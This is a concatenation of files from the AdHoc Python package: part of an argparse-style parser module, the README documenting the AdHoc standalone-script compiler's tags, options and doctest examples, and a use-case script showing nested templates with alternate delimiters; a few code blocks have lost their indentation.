        # NOTE(review): ``basestring`` is the Python-2 name; presumably
        # a compatibility alias is defined elsewhere in this module for
        # Python 3 -- confirm.
        if isinstance(value, basestring):
            value = self._get_value(action, value)
        self._check_value(action, value)

    # when nargs='*' on a positional, if there were no command-line
    # args, use the default if it is anything other than None
    elif (not arg_strings and action.nargs == ZERO_OR_MORE and
          not action.option_strings):
        if action.default is not None:
            value = action.default
        else:
            value = arg_strings
        self._check_value(action, value)

    # single argument or optional argument produces a single value
    elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]:
        arg_string, = arg_strings
        value = self._get_value(action, arg_string)
        self._check_value(action, value)

    # REMAINDER arguments convert all values, checking none
    elif action.nargs == REMAINDER:
        value = [self._get_value(action, v) for v in arg_strings]

    # PARSER arguments convert all values, but check only the first
    elif action.nargs == PARSER:
        value = [self._get_value(action, v) for v in arg_strings]
        self._check_value(action, value[0])

    # all other types of nargs produce a list
    else:
        value = [self._get_value(action, v) for v in arg_strings]
        for v in value:
            self._check_value(action, v)

    # return the converted value
    return value
def _get_value(self, action, arg_string):
    """Convert *arg_string* using the action's registered type function.

    Raises ArgumentError when the type function is not callable or when
    the conversion fails (ArgumentTypeError, TypeError or ValueError).
    """
    type_func = self._registry_get('type', action.type, action.type)
    if not _callable(type_func):
        msg = _('%r is not callable')
        raise ArgumentError(action, msg % type_func)

    # convert the value to the appropriate type
    try:
        result = type_func(arg_string)

    # ArgumentTypeErrors indicate errors; re-raise their message as-is.
    # (The exception is fetched via exc_info() to keep Python 2.4
    # syntax compatibility; the unused ``name`` binding from the
    # original code has been dropped.)
    except ArgumentTypeError:
        msg = str(_sys.exc_info()[1])
        raise ArgumentError(action, msg)

    # TypeErrors or ValueErrors also indicate errors
    except (TypeError, ValueError):
        name = getattr(action.type, '__name__', repr(action.type))
        msg = _('invalid %s value: %r')
        raise ArgumentError(action, msg % (name, arg_string))

    # return the converted value
    return result
def _check_value(self, action, value):
# converted value must be one of the choices (if specified)
if action.choices is not None and value not in action.choices:
tup = value, ', '.join(map(repr, action.choices))
msg = _('invalid choice: %r (choose from %s)') % tup
raise ArgumentError(action, msg)
# =======================
# Help-formatting methods
# =======================
def format_usage(self):
    """Return only the usage message for this parser as a string."""
    fmt = self._get_formatter()
    fmt.add_usage(self.usage, self._actions, self._mutually_exclusive_groups)
    return fmt.format_help()
def format_help(self):
    """Return the complete help message as a string.

    The message contains, in order: the usage line, the parser
    description, one section per action group, and the epilog.
    """
    fmt = self._get_formatter()
    fmt.add_usage(self.usage, self._actions, self._mutually_exclusive_groups)
    fmt.add_text(self.description)
    for group in self._action_groups:
        fmt.start_section(group.title)
        fmt.add_text(group.description)
        fmt.add_arguments(group._group_actions)
        fmt.end_section()
    fmt.add_text(self.epilog)
    return fmt.format_help()
def format_version(self):
    """Deprecated: return ``self.version`` formatted as a help string.

    Kept for backward compatibility only; the ``version`` constructor
    argument it relies on is no longer supported.
    """
    import warnings
    warnings.warn(
        'The format_version method is deprecated -- the "version" '
        'argument to ArgumentParser is no longer supported.',
        DeprecationWarning)
    formatter = self._get_formatter()
    formatter.add_text(self.version)
    return formatter.format_help()
def _get_formatter(self):
    # Instantiate the configured help-formatter class for this parser's
    # program name.
    return self.formatter_class(prog=self.prog)
# =====================
# Help-printing methods
# =====================
def print_usage(self, file=None):
    """Write the parser's usage message to *file* (sys.stdout if None)."""
    target = _sys.stdout if file is None else file
    self._print_message(self.format_usage(), target)
def print_help(self, file=None):
    """Write the full help message to *file* (sys.stdout if None)."""
    target = _sys.stdout if file is None else file
    self._print_message(self.format_help(), target)
def print_version(self, file=None):
    """Deprecated: write ``format_version()`` output to *file*.

    Kept for backward compatibility only; see ``format_version``.
    """
    import warnings
    warnings.warn(
        'The print_version method is deprecated -- the "version" '
        'argument to ArgumentParser is no longer supported.',
        DeprecationWarning)
    self._print_message(self.format_version(), file)
def _print_message(self, message, file=None):
if message:
if file is None:
file = _sys.stderr
file.write(message)
# ===============
# Exiting methods
# ===============
def exit(self, status=0, message=None):
    """Terminate the process with exit code *status*, optionally
    writing *message* to stderr first."""
    if message:
        self._print_message(message, _sys.stderr)
    _sys.exit(status)
def error(self, message):
    """error(message: string)

    Prints a usage message incorporating the message to stderr and
    exits with status 2.

    If you override this in a subclass, it should not return -- it
    should either exit or raise an exception.
    """
    self.print_usage(_sys.stderr)
    self.exit(2, _('%s: error: %s\n') % (self.prog, message))
.. -*- mode: rst; coding: utf-8 -*-
.. role:: mod(strong)
.. role:: func(strong)
.. role:: class(strong)
.. role:: attr(strong)
.. role:: meth(strong)
AdHoc Standalone Python Script Generator
########################################
The *AdHoc* compiler can be used as a program (see `Script Usage`_)
as well as a module (see :class:`adhoc.AdHoc`).
Since the *AdHoc* compiler itself is installed as a compiled *AdHoc*
script, it serves as its own usage example.
After installation of the *adhoc.py* script, the full source can be
obtained in directory ``__adhoc__``, by executing::
adhoc.py --explode
.. contents::
Purpose
=======
*AdHoc* provides python scripts with
- template facilities
- default file generation
- standalone module inclusion
*AdHoc* has been designed to provide an implode/explode cycle:
======== ======= ========= ======= =========
source_0 xsource_0
source_1 implode explode xsource_1
... ------> script.py ------> ...
source_n xsource_n
======== ======= ========= ======= =========
where ``xsource_i === source_i``. I.e., ``diff source_i xsource_i``
does not produce any output.
Quickstart
==========
module.py:
| # -\*- coding: utf-8 -\*-
| mvar = 'value'
script.py:
| # -\*- coding: utf-8 -\*-
| # |adhoc_run_time|
| import module # |adhoc|
| print('mvar: ' + module.mvar)
Compilation::
adhoc.py --compile script.py >/tmp/script-compiled.py
Execution outside source directory::
cd /tmp && python script-compiled.py
shows::
mvar: value
Decompilation::
cd /tmp && \
mkdir -p __adhoc__ && \
adhoc.py --decompile <script-compiled.py >__adhoc__/script.py
.. |@:| replace:: ``@:``
.. |:@| replace:: ``:@``
.. |adhoc_run_time| replace:: |@:|\ ``adhoc_run_time``\ |:@|
.. |adhoc| replace:: |@:|\ ``adhoc``\ |:@|
Description
===========
The *AdHoc* compiler/decompiler parses text for tagged lines and
processes them as instructions.
The minimal parsed entity is a tagged line, which is any line
containing a recognized *AdHoc* tag.
All *AdHoc* tags are enclosed in delimiters (default: |@:| and |:@|). E.g:
|@:|\ adhoc\ |:@|
Delimiters come in several flavors, namely line and section
delimiters and a set of macro delimiters. By default, line and
section delimiters are the same, but they can be defined separately.
`Flags`_ are tagged lines, which denote a single option or
command. E.g.:
| import module # |@:|\ adhoc\ |:@|
| # |@:|\ adhoc_self\ |:@| my_module_name
`Sections`_ are tagged line pairs, which delimit a block of
text. The first tagged line opens the section, the second tagged
line closes the section. E.g.:
| # |@:|\ adhoc_enable\ |:@|
| # disabled_command()
| # |@:|\ adhoc_enable\ |:@|
`Macros`_ have their own delimiters (default: |@m| and |m>|). E.g.:
| # |@m|\ MACRO_NAME\ |m>|
The implementation is realized as class :class:`adhoc.AdHoc` which
is mainly used as a namespace. The run-time part of
:class:`adhoc.AdHoc` -- which handles module import and file export
-- is included verbatim as class :class:`RtAdHoc` in the generated
output.
Flags
-----
:|adhoc_run_time|:
The place where the *AdHoc* run-time code is added. This flag must
be present in files, which use the |adhoc| import feature. It
is not needed for the enable/disable features.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_run_time|
:|adhoc| [force] [flat | full]:
Mark import line for run-time compilation.
If ``force`` is specified, the module is imported, even if it
was imported before.
If ``flat`` is specified, the module is not recursively
exported.
If ``full`` is specified, the module is recursively
exported. (This parameter takes priority over ``flat``).
If neither ``flat`` nor ``full`` are specified,
:attr:`adhoc.AdHoc.flat` determines the export scope.
This flag is ignored, if the line is commented out. E.g.:
| # import module # |adhoc|
.. _adhoc_include:
:|adhoc_include| file_spec, ...:
Include files for unpacking. ``file_spec`` is one of
:file:
``file`` is used for both input and output.
:file ``from`` default-file:
``file`` is used for input and output. if ``file`` does not
exist, ``default-file`` is used for input.
:source-file ``as`` output-file:
``source-file`` is used for input. ``output-file`` is used for
output. If ``source-file`` does not exist, ``output-file`` is
used for input also.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_include| file
:|adhoc_verbatim| [flags] file_spec, ...:
Include files for verbatim extraction. See adhoc_include_ for
``file_spec``.
The files are included as |adhoc_template_v| sections. *file* is used
as *export_file* mark. If *file* is ``--``, the template disposition
becomes standard output.
Optional flags can be any combination of ``[+|-]NUM`` for
indentation and ``#`` for commenting. E.g.:
| # |adhoc_verbatim| +4# my_file from /dev/null
*my_file* (or ``/dev/null``) is read, commented and indented 4
spaces.
If the |adhoc_verbatim| tag is already indented, the specified
indentation is subtracted.
This flag is ignored, if double commented. E.g.:
| # # |adhoc_verbatim| file
:|adhoc_self| name ...:
Mark name(s) as currently compiling. This is useful if
``__init__.py`` imports other module parts. E.g.:
| import pyjsmo # |@:|\ adhoc\ |:@|
where ``pyjsmo/__init__.py`` contains:
| # |@:|\ adhoc_self\ |:@| pyjsmo
| from pyjsmo.base import * # |@:|\ adhoc\ |:@|
:|adhoc_compiled|:
If present, no compilation is done on this file. This flag is
added by the compiler to the run-time version.
Sections
--------
:|adhoc_enable|:
Leading comment char and exactly one space are removed from lines
in these sections.
:|adhoc_disable|:
A comment char and exactly one space are added to non-blank
lines in these sections.
:|adhoc_template| -mark | export_file:
If mark starts with ``-``, the output disposition is standard output
and the template is ignored, when exporting.
Otherwise, the template is written to output_file during export.
All template parts with the same mark/export_file are concatenated
to a single string.
:|adhoc_template_v| export_file:
Variation of |adhoc_template|. Automatically generated by |adhoc_verbatim|.
:|adhoc_uncomment|:
Treated like |adhoc_enable| before template output.
:|adhoc_indent| [+|-]NUM:
Add or remove indentation before template output.
:|adhoc_import|:
Imported files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_unpack|:
Included files are marked as such by the compiler. There is no
effect during compilation.
:|adhoc_remove|:
Added sections are marked as such by the compiler. Removal is
done when exporting.
Before compilation, existing |adhoc_remove| tags are renamed to
|adhoc_remove_|.
After automatically added |adhoc_remove| sections have been
removed during export, remaining |adhoc_remove_| tags are
renamed to |adhoc_remove| again.
.. note:: Think twice, before removing material from original
sources at compile time. It will violate the condition
``xsource_i === source_i``.
:|adhoc_run_time_engine|:
The run-time class :class:`RtAdHoc` is enclosed in this special
template section.
It is exported as ``rt_adhoc.py`` during export.
Macros
------
Macros are defined programmatically::
AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
A macro is invoked by enclosing a MACRO_NAME in
:attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
:|MACRO_NAME|:
Macro call.
Internal
--------
:|adhoc_run_time_class|:
Marks the beginning of the run-time class. This is only
recognized in the *AdHoc* program/module.
:|adhoc_run_time_section|:
All sections are concatenated and used as run-time code. This is
only recognized in the *AdHoc* program/module.
In order to preserve the ``xsource_i === source_i`` bijective
condition, macros are expanded/collapsed with special macro
definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
Default: |<m|, |m@|).
:|adhoc_macro_call|:
Macro call section.
:|adhoc_macro_expansion|:
Macro expansion section.
AdHoc Script
============
.. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
.. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
.. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
.. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
.. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
.. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
.. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
.. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
.. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
.. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
.. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
.. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
.. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
.. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
.. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
.. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
.. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
.. |@m| replace:: ``@|:``
.. |m>| replace:: ``:|>``
.. |<m| replace:: ``<|:``
.. |m@| replace:: ``:|@``
.. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
.. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
.. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
.. _Script Usage:
adhoc.py - Python ad hoc compiler.
====== ====================
usage: adhoc.py [OPTIONS] [file ...]
or import adhoc
====== ====================
Options
=======
===================== ==================================================
-c, --compile compile file(s) or standard input into output file
(default: standard output).
-d, --decompile decompile file(s) or standard input into
output directory (default ``__adhoc__``).
-o, --output OUT output file for --compile/output directory for
--decompile.
-q, --quiet suppress warnings
-v, --verbose verbose test output
--debug[=NUM] show debug information
-h, --help display this help message
--documentation display module documentation.
--template list show available templates.
--eide[=COMM] Emacs IDE template list (implies --template list).
--template[=NAME] extract named template to standard
output. Default NAME is ``-``.
--extract[=DIR] extract adhoc files to directory DIR (default: ``.``)
--explode[=DIR] explode script with adhoc in directory DIR
(default ``__adhoc__``)
--implode implode script with adhoc
--install install adhoc.py script
-t, --test run doc tests
===================== ==================================================
*adhoc.py* is compatible with Python 2.4+ and Python 3. (For Python
<2.6 the packages *stringformat* and *argparse* are needed and
included.)
.. _END_OF_HELP:
.. |=NUM| replace:: ``[=NUM]``
Script Examples
===============
Templates
---------
Sections marked by |adhoc_template| can be retrieved as templates on
standard output.
Additionally, all other files compiled into an adhoc file with one of
================ ======================
|adhoc| ==> |adhoc_import|
|adhoc_verbatim| ==> |adhoc_template_v|
|adhoc_include| ==> |adhoc_unpack|
================ ======================
are accessible as templates.
``python adhoc.py --template list`` provides a list of templates:
>>> ign = main('adhoc.py --template list'.split())
================================================= ================================ ================
Command Template Type
================================================= ================================ ================
adhoc.py --template adhoc_test # !adhoc_test adhoc_import
adhoc.py --template adhoc_test.sub # !adhoc_test.sub adhoc_import
adhoc.py --template argparse_local # !argparse_local adhoc_import
adhoc.py --template namespace_dict # !namespace_dict adhoc_import
adhoc.py --template stringformat_local # !stringformat_local adhoc_import
adhoc.py --template use_case_000_ # !use_case_000_ adhoc_import
adhoc.py --template use_case_001_templates_ # !use_case_001_templates_ adhoc_import
adhoc.py --template use_case_002_include_ # !use_case_002_include_ adhoc_import
adhoc.py --template use_case_003_import_ # !use_case_003_import_ adhoc_import
adhoc.py --template use_case_005_nested_ # !use_case_005_nested_ adhoc_import
adhoc.py --template docutils.conf # docutils.conf adhoc_template_v
adhoc.py --template # - adhoc_template
adhoc.py --template README.txt # README.txt adhoc_template
adhoc.py --template adhoc_init # -adhoc_init adhoc_template
adhoc.py --template catch-stdout # -catch-stdout adhoc_template
adhoc.py --template col-param-closure # -col-param-closure adhoc_template
adhoc.py --template doc/USE_CASES.txt # doc/USE_CASES.txt adhoc_template
adhoc.py --template doc/index.rst # doc/index.rst adhoc_template
adhoc.py --template max-width-class # -max-width-class adhoc_template
adhoc.py --template rst-to-ascii # -rst-to-ascii adhoc_template
adhoc.py --template test # -test adhoc_template
adhoc.py --template MANIFEST.in # !MANIFEST.in adhoc_unpack
adhoc.py --template Makefile # !Makefile adhoc_unpack
adhoc.py --template README.css # !README.css adhoc_unpack
adhoc.py --template doc/Makefile # !doc/Makefile adhoc_unpack
adhoc.py --template doc/_static/adhoc-logo-32.ico # !doc/_static/adhoc-logo-32.ico adhoc_unpack
adhoc.py --template doc/adhoc-logo.svg # !doc/adhoc-logo.svg adhoc_unpack
adhoc.py --template doc/conf.py # !doc/conf.py adhoc_unpack
adhoc.py --template doc/make.bat # !doc/make.bat adhoc_unpack
adhoc.py --template doc/z-massage-index.sh # !doc/z-massage-index.sh adhoc_unpack
adhoc.py --template setup.py # !setup.py adhoc_unpack
================================================= ================================ ================
``python adhoc.py --template`` prints the standard template ``-``
(closing delimiter replaced by ellipsis):
>>> ign = main('./adhoc.py --template'.split()) #doctest: +ELLIPSIS
# @:adhoc_disable... allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# @:adhoc_disable...
<BLANKLINE>
# @:adhoc_run_time... The run-time class goes here
# @:adhoc_run_time_engine... settings enabled at run-time
# @:adhoc_enable...
# RtAdHoc.flat = False
# @:adhoc_enable...
# @:adhoc_run_time_engine...
<BLANKLINE>
#import adhoc # @:adhoc...
``python adhoc.py --template test`` prints the template named ``-test``.
the leading ``-`` signifies disposition to standard output:
>>> ign = main('./adhoc.py --template test'.split())
Test template.
Extract
-------
The default destination for extracting files is the current working
directory.
Files extracted consist of
- packed files generated by |adhoc_include|
- templates generated by |adhoc_verbatim|
- templates with a file destination other than standard output
``python adhoc.py --extract __adhoc_extract__`` unpacks the following files into
directory ``__adhoc_extract__``:
>>> import shutil
>>> ign = main('./adhoc.py --extract __adhoc_extract__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_extract__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_extract__/MANIFEST.in
__adhoc_extract__/Makefile
__adhoc_extract__/README.css
__adhoc_extract__/README.txt
__adhoc_extract__/doc/Makefile
__adhoc_extract__/doc/USE_CASES.txt
__adhoc_extract__/doc/_static/adhoc-logo-32.ico
__adhoc_extract__/doc/adhoc-logo.svg
__adhoc_extract__/doc/conf.py
__adhoc_extract__/doc/index.rst
__adhoc_extract__/doc/make.bat
__adhoc_extract__/doc/z-massage-index.sh
__adhoc_extract__/docutils.conf
__adhoc_extract__/setup.py
__adhoc_extract__/use_case_000_.py
__adhoc_extract__/use_case_001_templates_.py
__adhoc_extract__/use_case_002_include_.py
__adhoc_extract__/use_case_003_import_.py
__adhoc_extract__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_extract__')
Export
------
The default destination for exporting files is the
subdirectory ``__adhoc__``.
Files exported consist of
- imported modules generated by |adhoc|
- all files covered in section `Extract`_
``python adhoc.py --explode __adhoc_explode__`` unpacks the following files into
directory ``__adhoc_explode__``:
>>> import shutil
>>> ign = main('./adhoc.py --explode __adhoc_explode__'.split())
>>> file_list = []
>>> for dir, subdirs, files in os.walk('__adhoc_explode__'):
... file_list.extend([os.path.join(dir, file_) for file_ in files])
>>> for file_ in sorted(file_list):
... printf(file_)
__adhoc_explode__/MANIFEST.in
__adhoc_explode__/Makefile
__adhoc_explode__/README.css
__adhoc_explode__/README.txt
__adhoc_explode__/adhoc.py
__adhoc_explode__/adhoc_test/__init__.py
__adhoc_explode__/adhoc_test/sub/__init__.py
__adhoc_explode__/argparse_local.py
__adhoc_explode__/doc/Makefile
__adhoc_explode__/doc/USE_CASES.txt
__adhoc_explode__/doc/_static/adhoc-logo-32.ico
__adhoc_explode__/doc/adhoc-logo.svg
__adhoc_explode__/doc/conf.py
__adhoc_explode__/doc/index.rst
__adhoc_explode__/doc/make.bat
__adhoc_explode__/doc/z-massage-index.sh
__adhoc_explode__/docutils.conf
__adhoc_explode__/namespace_dict.py
__adhoc_explode__/rt_adhoc.py
__adhoc_explode__/setup.py
__adhoc_explode__/stringformat_local.py
__adhoc_explode__/use_case_000_.py
__adhoc_explode__/use_case_001_templates_.py
__adhoc_explode__/use_case_002_include_.py
__adhoc_explode__/use_case_003_import_.py
__adhoc_explode__/use_case_005_nested_.py
>>> shutil.rmtree('__adhoc_explode__')
File Permissions
================
- File mode is restored.
- File ownership is not restored.
- File modification times are restored.
Since only naive datetimes are recorded, this only works correctly
within the same timezone.
.. :ide: COMPILE: render reST as HTML
.. . (let* ((fp (buffer-file-name)) (fn (file-name-nondirectory fp))) (save-match-data (if (string-match-t "[.][^.]*$" fn) (setq fn (replace-match "" nil t fn)))) (let ((args (concat " " fp " | ws_rst2html.py --traceback --cloak-email-addresses | tee " fn ".html "))) (save-buffer) (compile (concat "PATH=\".:$PATH\"; cat " args))))
..
.. Local Variables:
.. mode: rst
.. snip-mode: rst
.. truncate-lines: t
.. symbol-tag-symbol-regexp: "[-0-9A-Za-z_#]\\([-0-9A-Za-z_. ]*[-0-9A-Za-z_]\\|\\)"
.. symbol-tag-auto-comment-mode: nil
.. symbol-tag-srx-is-safe-with-nil-delimiters: nil
.. End:
| AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/README.txt | README.txt |
# @:adhoc_uncomment:@
# @:adhoc_template:@ -intro
# Nested Templates
# ----------------
#
# Since AdHoc sections are defined with the same tag denoting start
# and end, it may not be obvious how nested templates can be realized.
#
# There are several different ways to achieve section nesting:
#
# - `Alternate Tag Symbols`_
# - `Alternate Tag Delimiters`_
# - replace strings and extract templates
#
# @:adhoc_template:@
# @:adhoc_uncomment:@
# --------------------------------------------------
# |||:sec:||| Example
# --------------------------------------------------
# @:adhoc_indent:@ +4
# <:adhoc_indent:> +4
# <:adhoc_template:> -example
# @:adhoc_uncomment:@
# @:adhoc_template:@ -doc
# Documentation
# =============
#
# Summary
#
# @:adhoc_x_full_doc:@ -details
# @:adhoc_template:> -details
# Details
# -------
#
# Lengthy explanation ...
#
# @:adhoc_template:>
# @:adhoc_x_full_doc:@
# Conclusion
# ----------
#
# Good!
#
# @:adhoc_x_full_doc:@
# @:adhoc_template:>
# Because ...
#
# @:adhoc_template:>
# @:adhoc_x_full_doc:@
# @:adhoc_template:@
# @:adhoc_uncomment:@
# <:adhoc_template:> -example
# <:adhoc_indent:>
# @:adhoc_indent:@
# --------------------------------------------------
# |||:sec:||| Generator
# --------------------------------------------------
# Macro bodies for the AdHoc compiler.  Each tag inside the strings is
# assembled from adjacent string literals (implicit concatenation) so
# that this file's own tag scanner does not mistake the macro text for
# a real section tag.  Do not merge the literal pieces.
uc_descr_beg = (
    '# <:' 'adhoc_uncomment:>\n'
    '# o:' 'adhoc_template:>\n'
    '# i:' 'adhoc_template:>\n'
)
uc_descr_out = (
    '# i:' 'adhoc_template:>\n'
)
uc_descr_end = (
    '# o:' 'adhoc_template:>\n'
    '# <:' 'adhoc_uncomment:>\n'
)
uc_code_beg = (
    '# i:' 'adhoc_indent:> 4\n'
    '# <:' 'adhoc_template:>\n'
)
uc_code_end = (
    '# <:' 'adhoc_template:>\n'
    '# i:' 'adhoc_indent:>\n'
)
# Registry installed as RtAdHoc.macros in main(): maps macro name to
# its expansion string.
macros = {
    'uc_descr_beg': uc_descr_beg,
    'uc_descr_out': uc_descr_out,
    'uc_descr_end': uc_descr_end,
    'uc_code_beg': uc_code_beg,
    'uc_code_end': uc_code_end,
}
def main(argv):
    '''compiler and help/example/documentation extractor'''
    global RtAdHoc
    RtAdHoc.macros = macros
    if len(argv) > 1:
        if argv[1].startswith('-h') or argv[1].startswith('--h'):
            print(__doc__)
            return 1
        if (argv[1].startswith('--c')
            or argv[1].startswith('--d')
            or argv[1].startswith('--t')):
            file_, source = RtAdHoc.std_source_param(__file__)
            # Running compiled (neither adhoc nor rt_adhoc imported):
            # recover the original source from the compiled script.
            if 'adhoc' not in globals() and 'rt_adhoc' not in globals():
                compiled = source
                source = RtAdHoc.export_source(source)
            else:
                if 'adhoc' not in globals():
                    # this will most certainly fail
                    from adhoc import AdHoc as RtAdHoc
                    RtAdHoc.macros = macros
                compiled = None
            if argv[1].startswith('--t'):
                template(RtAdHoc.activate_macros(source))
                return 1
            if compiled is None:
                compiled = RtAdHoc().compile(source)
            if argv[1].startswith('--c'):
                RtAdHoc.write_source('-', compiled)
                return 1
            if argv[1].startswith('--d'):
                documentation()
                return 1
        # BUG FIX: the original used ``map(sys.stderr.write, ...)``,
        # which is lazy under Python 3 and therefore never wrote the
        # message.  Write the joined message explicitly instead.
        sys.stderr.write(
            'error: unknown option `' + str(argv[1]) + '`\n')
        exit(1)
    return 0
# --------------------------------------------------
# |||:sec:||| Setup
# --------------------------------------------------
# @:adhoc_template:@ -generic-init
# @:adhoc_run_time:@
# @:adhoc_disable:@
# Get RtAdHoc from adhoc or rt_adhoc
import os
import sys
os_path = os.defpath
if 'PATH' in os.environ:
os_path = os.environ['PATH']
sys_path = sys.path
sys.path.extend(os_path.split(os.pathsep))
try:
import adhoc
from adhoc import AdHoc as RtAdHoc
except ImportError:
try:
import rt_adhoc
from rt_adhoc import RtAdHoc
except ImportError:
pass
sys.path = sys_path
# @:adhoc_disable:@
# @:adhoc_template:@ -generic-init
@classmethod
def __getstate__(cls):
    """Capture the current delimiter configuration as a restorable dict."""
    return dict((name, getattr(cls, name))
                for name in ('line_delimiters', 'section_delimiters'))
@classmethod
def __setstate__(cls, state):
    """Apply a configuration dict previously captured by __getstate__."""
    for name in state:
        setattr(cls, name, state[name])
@classmethod
def set_delimiters(cls, line_delimiters, section_delimiters=None):
    """Install new tag delimiters and return the previous state.

    When *section_delimiters* is omitted, the line delimiters are used
    for sections as well.  Pass the returned state to
    ``reset_delimiters`` to restore the old configuration.
    """
    previous = cls.__getstate__()
    cls.line_delimiters = line_delimiters
    cls.section_delimiters = (
        line_delimiters if section_delimiters is None else section_delimiters)
    return previous
# Restoring a saved delimiter state is exactly __setstate__.
reset_delimiters = __setstate__
def print_template(cls, name, source=None):
    """Fetch the template *name* via *cls* and write it to standard output."""
    cls.write_source('-', cls.get_named_template(name, __file__, source))
# Monkey-patch the state/delimiter helpers onto RtAdHoc when the
# run-time class in use does not already provide them.
if not hasattr(RtAdHoc, '__getstate__'):
    RtAdHoc.__getstate__ = __getstate__
    RtAdHoc.__setstate__ = __setstate__
if not hasattr(RtAdHoc, 'set_delimiters'):
    RtAdHoc.set_delimiters = set_delimiters
    RtAdHoc.reset_delimiters = reset_delimiters
# --------------------------------------------------
# |||:sec:||| Documentation
# --------------------------------------------------
def template(source=None):  # ||:fnc:||
    """Write this file's documentation templates to standard output.

    Emits the generic init template, then the six alternate-symbol
    templates, then the five alternate-delimiter templates.
    """
    if source is None:
        source = RtAdHoc.read_source(__file__)
    # Tag fragments are split into adjacent literals so this file's own
    # scanner does not recognize them; do not merge the pieces.
    source = source.replace('<:' 'adhoc', '@:' 'adhoc')
    source = source.replace('@:' 'adhoc_indent' ':@ -0',
                            '@:' 'adhoc_indent' ':@ -4')
    print_template(RtAdHoc, '-generic-init', source)
    RtAdHoc.write_source('-', '\n')
    for index in range(1, 7):
        print_template(RtAdHoc, '-alt-sym%d' % index, source)
    RtAdHoc.write_source('-', '\n')
    for index in range(1, 6):
        print_template(RtAdHoc, '-alt-dlm%d' % index, source)
def documentation(): # ||:fnc:||
    """Print the use-case documentation to standard output.

    NOTE(review): the comment lines below carry adhoc section tags that
    are read back from this file by the template machinery; adding or
    removing comment lines inside the tagged sections changes the
    generated documentation, so comments are kept untouched there.
    """
    print_template(RtAdHoc, '-intro')
    example_delimiters = ('<:', ':>')
    state = RtAdHoc.set_delimiters(example_delimiters)
    example_raw = RtAdHoc.get_named_template('-example', __file__)
    RtAdHoc.reset_delimiters(state)
    full_doc_delimiters = ('@:', ':>')
    state = RtAdHoc.set_delimiters(full_doc_delimiters)
    example1 = RtAdHoc.section_tag_remove(example_raw, 'adhoc_template')
    RtAdHoc.reset_delimiters(state)
    example2 = RtAdHoc.section_tag_remove(example_raw, 'adhoc_x_full_doc')
    # |:here:|
    # @:adhoc_uncomment:@
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym1
    # @:adhoc_template:@ -alt-sym1
    # Alternate Tag Symbols
    # ~~~~~~~~~~~~~~~~~~~~~
    #
    # Consider some detailed documentation::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-sym1')
    RtAdHoc.write_source('-', example1)
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym2
    # @:adhoc_template:@ -alt-sym2
    #
    # The raw template::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-sym2
    template_raw = RtAdHoc.get_named_template('-doc', __file__)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    template_raw = RtAdHoc.get_named_template('-doc', None, example1)
    print_template(RtAdHoc, '-alt-sym2')
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym3
    # @:adhoc_template:@ -alt-sym3
    #
    # is easily split into parts of different scope::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-sym3
    full_doc_tag_sym = 'adhoc_x_full_doc'
    full_doc_tag = RtAdHoc.section_tag(full_doc_tag_sym)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-sym3')
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym4
    # @:adhoc_template:@ -alt-sym4
    #
    # by removing all tagged detail sections::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -0
    # @:adhoc_template:@ -alt-sym4
    short_doc = RtAdHoc.remove_sections(template_raw, full_doc_tag_sym)
    # @:adhoc_template:@
    # @:adhoc_indent:@
    # @:adhoc_indent:@ -4
    # <:adhoc_template:@ -alt-sym4
    # @:adhoc_template:@ -alt-sym4
    #
    # providing for a short summary::
    #
    # @:adhoc_template:@
    # <:adhoc_template:@
    # @:adhoc_indent:@
    print_template(RtAdHoc, '-alt-sym4')
    RtAdHoc.write_source('-', short_doc)
    # @:adhoc_indent:@ -4
